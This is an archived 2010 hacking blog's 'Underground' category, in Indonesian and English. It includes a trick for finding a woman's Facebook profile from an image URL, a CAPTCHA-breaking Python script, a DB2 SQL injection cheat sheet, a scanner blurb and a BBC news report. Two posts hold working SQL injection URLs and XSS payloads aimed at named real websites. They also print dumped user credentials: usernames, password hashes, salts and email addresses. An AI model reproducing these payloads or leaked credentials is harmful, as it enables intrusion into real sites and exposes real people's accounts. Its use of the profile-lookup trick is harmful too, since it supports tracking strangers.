Archive

Archive for the ‘Underground’ Category

[Facebook] mengetahui facebook user hanya dengan gambar

December 31, 2010 Leave a comment

sering liat di forum liat orang post gambar dari fb, nah kalo cewek cantik jadi penasaran FBnya..

akhirnya saya ulik deh… nih contoh kasus ya,

saya liat ni gambar :

katanya si cewe, dia bilang lagi bareng kakanya…

woaaa jadi penasaran cantik ga ya…

okay pertama gw liat url tu file seperti berikut : ( sebelumnya di url ada huruf X besar itu url yang saya sensor, sebenarnya itu angka )

trus saya ambil angka yg ini : 53963478X lalu buat page baru trus ketik di url :

http://www.facebook.com/profile.php?id=53963478X

tadaaaaaa wow kebuka lol

Advertisements
Categories: Hacking, Underground

Breaking Weak CAPTCHA in 26 Lines of Code

July 10, 2010 Leave a comment

During one of our latest engagements we found a weak CAPTCHA implementation being used in the target Web application. The assessment was being performed on-site, and after identifying this vulnerability we started to talk with the CSO about how easy it would be to break it.

jxt9e4ya9ko0

The general consensus of course was “very easy”. The problem was that we were unable to find any good CAPTCHA breaking software that average joe could download and run on his computer; so I spent some minutes creating a simple Python script that returns the CAPTCHA solution for this particular implementation.

Before we dig into the script, lets analyze why this CAPTCHA is weak (might not be obvious for some readers):

  1. The letters are not rotated
  2. All letters have the same height
  3. All letters have the exact same color
  4. The letters are not deformed in any way
  5. The background noise color is the same for the whole image

Now, lets see the code that breaks this CAPTCHA:

from PIL import Image

img = Image.open('input.gif')
img = img.convert("RGBA")

pixdata = img.load()

# Clean the background noise, if color != black, then set to white.
for y in xrange(img.size[1]):
for x in xrange(img.size[0]):
if pixdata[x, y] != (0, 0, 0, 255):
pixdata[x, y] = (255, 255, 255, 255)

img.save("input-black.gif", "GIF")

#   Make the image bigger (needed for OCR)
im_orig = Image.open('input-black.gif')
big = im_orig.resize((116, 56), Image.NEAREST)

ext = ".tif"
big.save("input-NEAREST" + ext)

#   Perform OCR using pytesser library
from pytesser import *
image = Image.open('input-NEAREST.tif')
print image_to_string(image)

This simple script works with ~ 90% of the CAPTCHA images created using this specific implementation. Enjoy!

Categories: Security, Underground

DB2 SQL Injection Cheat Sheet

July 10, 2010 Leave a comment

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience.  When you do find one, though it pays to be prepared…

Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection.  All tests were performed on DB2 8.2 under Windows.

This post is part of series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

Version select versionnumber, version_timestamp from sysibm.sysversions;
Comments select blah from foo; — comment like this
Current User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges select * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
List DBA Accounts TODO
Current Database select current server from sysibm.sysdummy1;
List Databases SELECT schemaname FROM syscat.schemata;
List Columns select name, tbname, coltype from sysibm.syscolumns;
List Tables select name from sysibm.systables;
Find Tables From Column Name TODO
Select Nth Row select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1;  — returns b
Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char select chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Value select ascii(‘A’) from sysibm.sysdummy1; — returns 65
Casting SELECT cast(‘123’ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ???See Heavy Queries article for some ideas.
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address TODO
Location of DB files TODO
Default/System Databases TODO

This page will probably remain a work-in-progress for some time yet.  I’ll update it as I learn more.

Categories: Hacking, Security, Underground

Acak-acak rumah orang part-1

July 6, 2010 2 comments

http://www.gencadam.net/en/

admin:7f12e2064eb055b6be03a473acfc9771:contact@gencadam.net:

admin:engenc00099

http://www.gencadam.net/en/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29r3m1ck,3,4,5/**/FROM/**/jos_users–

========

http://www.bulsho.dk/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29r3m1ck,3,4,5/**/FROM/**/jos_users–

admin:8ab893dd212a62b23447ae2073925cc8:KfVHoIGgho1F9ajh:bulsho@gmail.com:
,libaax12:389167c844757ca969f00cd9ab3c3337:VYBY7vGvBEJKsjQE:Frandol_165.9@hotmail.com:
,cabdicasis:00260d8b87a6fce6a6ee211b62e29b4b:cabdicasis@hotmail.com:
,guled:9ec35c0f02c63777cbc0e7c98519e3f4:LeEufIBo8YgWps0K:gulid@hotmail.com:
,jibril:6b92f611560c9b1cf370ed71b0abe88f:xb1zlbuWprq6scyK:4myangel@gmail.com:
,mubkos:bf9b65428310971c67c7e12699e3bcb0:0N7hh517D02NWUMV:dhaymoole@hotmail.com:
,Abdullqadir:ba78449adb51b564d34f0a95ff56079e:V5UCf4ibmo6iNaYF:Abdikadirey@hotmail.com:
,Abdikadirey@hotmail.com:c2c311bc7f0a70af0ebd609d47c63782:qaFNR6QtLT0F4SOE:Abdikadirey@hotmail.com:
,cabdinaasir2004:45e337722206f23b46ba8126a116eb56:sPEw4B9CCLdLCtys:cabdinaasir2004@hotmail.com:
,Hurdaayeyare:789e2333ee6f0d0eded0843a7bb437c0:AAn3j5FgMue2puEk:cismaaciil12@hotmail.com:
,caydruus:5ade1c16fab09598212fc25c31e3674b:DxMbCckrJnsyJGI9:caydruus@msn.com:
,qaloocoow:39f06b2fa0cd75c5079607e9fe87a813:8qhhG2r1HwcraZmg:maxgrane@hotm

cabdicasis : 281179

====

http://www.ptiq.ac.id/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)robusta_,3,4,5/**/FROM/**/jos_users–

=====

http://www.tvri.baliserve.com/home/search.php?keyword=”><h1>robusta_+here+found+some+XSS+=.=d</h1&gt;

=====
http://tube.transtv.co.id/

put Some XSS  on search box

Categories: Exploit, Hacking, Underground

XSS-1

July 6, 2010 Leave a comment

sumpah lagi males ngerjain kerjaan,, mending ngacak-ngacak rumah orang.. lalala

http://smansapati.com/news/?s=%22%3E%3Cscript%3Ealert%28%27robusta_+here+found+some+XSS%27%29%3C%2Fscript%3E

WhatWeb Web Scanner

July 4, 2010 Leave a comment

WhatWeb is a next generation web scanner that identifies what websites are running. Flexible plugin architecture with over 80 plugins so far. Passive plugins use information in the headers, cookies, HTML body and URL. Aggressive plugins can identify versions of Joomla, phpBB, etc by making extra requests to the webserver. Screenshots on the homepage.

Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage. Some of these hints are obvious, eg. “Powered by XYZ” and others are more subtle. WhatWeb recognises these hints and reports what it finds.

WhatWeb has over 160 plugins and needs community support to develop more. Plugins can identify systems with obvious signs removed by looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for “wp-content” which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID’s and more.

There are both passive and aggressive plugins, passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as light weight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write, you don’t need to know ruby to make them.

Screen Shot :

Download whatweb-0.4.4.tar.gz
Latest Version 0.4.4, 29th June 2010
License GPLv3
Author urbanadventurer aka Andrew Horton from Security-Assessment.com

original site : http://www.morningstarsecurity.com/research/whatweb

Categories: Underground

Hackers target Microsoft Windows XP support system

July 3, 2010 Leave a comment

Hi-tech criminals are “escalating” attacks on an unpatched bug in the Windows XP help and support system.

Microsoft said it had seen more than 10,000 machines hit by the attack that, so far, it has not found a fix for.

Windows PCs falling victim will have control of that machine handed over to attackers.

Microsoft said the attacks had gone from theoretical to real very quickly and urged users to take steps to protect themselves.
‘Nightmare’ attack

Microsoft revealed the upturn in attacks in a blog post saying that it had been monitoring activity around the loophole since it was first revealed on 10 June.

Found by Google engineer Travis Ormandy, the loophole revolves around the Help and Support system built into XP. Mr Ormandy found that it was possible to exploit its ability to give remote aid and apply fixes to ailing machines.

Initially, said Microsoft, it only saw “innocuous” attacks by researchers attempting to replicate what Mr Ormandy had found.

Real exploits turned up on 15 June and these have been enthusiastically adopted by hi-tech criminals.

Writing on the Microsoft Security Centre blog, Holly Stewart said it had started seeing “seemingly-automated, randomly-generated” web pages that host the exploit.

A variety of trojans, spam tools and viruses are being downloaded to compromised machines, she said.

Rik Ferguson, senior security researcher at Trend Micro, said: “It’s certainly very serious and is now being actively exploited by what appears to be several different groups as you can see from the multiple payloads being delivered.”

Carole Thierault, senior security consultant at Sophos, said attacks like this were a “nightmare” to defend against if people did not regularly update or use anti-virus.

Statistics gathered by Microsoft suggest Portugal was taking the brunt of the attacks but users in Russia and Croatia were also being hit. More than 10,000 machines had been hit at least once by the attack, it found.

To avoid falling victim, Microsoft advised users to turn off the part of the Help and Support system that is vulnerable. It has produced an automated tool that can do this for users.

Mr Ferguson from Trend Micro said there were other steps users could take to stay safe.

“It is important to ensure that your security software is capable of identifying and blocking malicious websites,” he said, “as you can be sure that the criminals behind this will be constantly updating their malicious files to try and avoid traditional security.”

Microsoft said it was working on a lasting fix for the loophole.

Source : http://news.bbc.co.uk/2/hi/technology/10473495.stm

Categories: Underground